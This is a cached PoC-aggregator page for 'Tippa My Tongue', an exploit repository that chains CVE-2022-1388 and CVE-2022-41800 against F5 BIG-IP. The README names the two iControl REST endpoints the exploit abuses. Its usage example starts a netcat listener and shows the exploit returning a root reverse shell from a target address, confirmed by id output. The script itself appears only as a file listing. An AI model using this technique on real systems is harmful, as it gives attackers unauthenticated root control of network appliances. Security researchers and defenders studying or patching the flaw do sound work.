Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
https://github.com/j-baines/tippa-my-tongue
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Description
F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800
Readme
# Tippa My Tongue

Tippa My Tongue is an exploit that uses CVE-2022-1388 and CVE-2022-41800 to establish a `root` reverse shell on F5 BIG-IP products. Most CVE-2022-1388 exploits achieve code execution using `/mgmt/tm/util/bash`. However, this exploit uses `/mgmt/shared/iapp/rpm-spec-creator`, followed by `/mgmt/shared/iapp/build-package`. This approach was first suggested by [Ron Bowes](https://github.com/rbowes-r7) in this AttackerKB [analysis](https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis). Although, to my knowledge, no one ever published a CVE-2022-1388 exploit that did just that.

For more details, read the [VulnCheck](https://vulncheck.com/blog/new-cve-2022-1388) writeup.

## Usage Example:

```
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄
   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██
    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪
    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.
    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ •
         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .
         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #
```

## Acknowledgements

* Ron Bowes: for discovering these endpoints and sharing them with the world
* [RHCP](https://www.youtube.com/watch?v=E1FNkf3MLKY): for being funky
File Snapshot

 [4.0K]  /data/pocs/ac45f073f30505b092bb8acd7f9d2af6224b743a
├── [1.0K]  LICENSE
├── [2.5K]  README.md
└── [5.4K]  tippa-my-tongue.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.